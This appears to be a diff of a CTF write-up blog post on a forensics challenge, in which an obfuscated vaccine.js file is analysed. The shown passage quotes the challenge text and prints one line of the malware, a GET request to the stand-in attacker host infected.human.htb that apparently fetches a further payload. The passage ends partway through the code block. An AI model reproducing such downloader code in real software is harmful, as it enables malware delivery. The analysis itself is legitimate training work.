B3nj4h/b/_posts/2023-12-10-university-ctf-2023-brains-and-bytes.md

 > Tasked with defending the antidote's research, a diverse group of students united against a relentless cyber onslaught.
 As codes clashed and defenses were tested, their collective effort stood as humanity's beacon, inching closer to safeguarding the research for the cure with every thwarted attack.
 A stealthy attack might have penetrated their defenses.
 Along with the Hackster's University students, analyze the provided file so you can detect this attack in the future.
 {: .prompt-info }

-We are provided with vaccine.js file which is somehow obfuscated so after analysing the file we come across a url `http://infected.human.htb/d/BKtQR`
+We are provided with vaccine.js file which is somehow obfuscated, so after analysing the file we come across a url `http://infected.human.htb/d/BKtQR`

 ```javascript
 lOLMCBgGDMolnlotrwOCsILGbKwBtzwvlYFqZdGLMqDxTrcBnpLiTUBqFfekJSDzoSURpLfjiRFSkUbDiScOejegcwcjNbnqGNXuTbtsxWGWvICjWnbUbbSrdUVFqffbkvjTgFhvQddrraBIrYWfNFerCZkSxFapZwPgmIRIyaedLHpBnOvnVBXwzWPxOQJgZModJeUo.open("GET", "http://infected.human.htb/d/BKtQR", false);